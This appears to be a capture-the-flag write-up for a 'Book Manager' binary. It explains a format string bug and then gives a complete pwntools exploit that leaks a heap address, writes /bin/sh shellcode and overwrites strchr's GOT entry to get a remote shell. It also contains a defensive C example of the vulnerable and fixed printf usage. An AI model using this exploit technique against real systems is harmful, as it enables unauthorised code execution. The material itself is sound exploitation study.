An ELF 32-bit LSB executable (not stripped) was given.
It is a menu-driven Book Manager program where you can Insert, List, Search, Delete, and Exit.
If you go through the search function you will find a format string vulnerability, and the protections of the binary are:
CANARY : ENABLED
FORTIFY : disabled
NX : disabled
PIE : disabled
RELRO : Partial
As NX is disabled we can execute shellcode. So here is the idea on how to solve the challenge:
[*] Leak any address from the heap through the format string vulnerability
[*] Write shellcode through the insert function
[*] Overwrite the GOT entry of strchr with the leaked heap address using the format string vulnerability
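To make the bug class concrete from the defender's side, here is an added C example (not the challenge's source, which is not on this page) of a search routine that hands the user's query to printf as the format string, next to the hardened form that passes it as a %s argument plus an input check that rejects conversion characters at the boundary. The function names are assumptions; the "Searching with: " prefix is taken from the prompt shown in the exploit.

```c
#include <stdio.h>
#include <string.h>

/* Vulnerable pattern (assumed to mirror the challenge's search routine):
 * the query itself becomes the format string, so "%7$x" reads a stack word
 * and "%n" can write to memory. Defined for illustration and never called. */
static void search_vulnerable(const char *query)
{
    printf("Searching with: ");
    printf(query);   /* BUG: attacker-controlled format string */
    putchar('\n');
}

/* Hardened form: the query is only ever a %s argument, so conversion
 * characters in it are printed literally. Writes the line into out and
 * returns the length the full line needs (snprintf semantics, so a short
 * buffer truncates instead of overflowing). */
static int search_safe(const char *query, char *out, size_t out_len)
{
    return snprintf(out, out_len, "Searching with: %s", query);
}

/* Defence in depth: a book title or search query has no business containing
 * '%', so it can be rejected before it reaches any printf-family call.
 * Returns 1 if the string contains a conversion character, else 0. */
static int has_format_directive(const char *s)
{
    return strchr(s, '%') != NULL;
}

int main(void)
{
    char line[64];
    const char *probe = "0x%7$x";   /* the leak probe used in the write-up */

    search_safe(probe, line, sizeof line);
    printf("%s\n", line);           /* the probe is echoed literally, nothing is leaked */
    printf("directive present: %d\n", has_format_directive(probe));

    (void)search_vulnerable;        /* referenced only to keep the compiler quiet */
    return 0;
}
```

With -Wformat-security the compiler already flags the printf(query) line, which is the cheapest detection for this whole bug class; the %s form is the actual fix, and the '%' check is an extra layer for inputs that should never be format-like.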
Here is the exploit:

from pwn import *
import format          # author's own helper module (not shown here) that builds the %n write payload

got_strchr = 0x804b038                      # GOT entry of strchr (PIE disabled, so the address is fixed)
shellcode = asm(shellcraft.linux.sh())      # i386 execve("/bin/sh") shellcode

def insert(name, idx=0):
    # Menu option 1: the book name is stored on the heap, so it carries the shellcode
    p.sendline("1")
    p.recvuntil("book name: ")
    p.sendline(name)
    p.sendlineafter("book id: ", str(idx))

def search(query, choice=False):
    # Menu option 3: the query is echoed back through printf as the format string
    p.sendline("3")
    p.recvuntil("query: ")
    p.sendline(query)
    p.recvuntil("Searching with: ")
    if choice:
        # the echoed value is the leaked heap pointer
        addr = int(p.recvline().strip(), 16)
        p.recvline()
        return addr

#p = process("level1.bin")
p = remote("34.198.96.6", 9001)

insert(shellcode)                           # place the shellcode on the heap
heap = search('0x%7$x', True)               # leak a heap address
log.success("{}".format(hex(heap)))
payload = format.makepayload(heap, got_strchr, '11')   # format string write: strchr@got <- heap address
search(payload)                             # the next call to strchr jumps to the shellcode
p.interactive()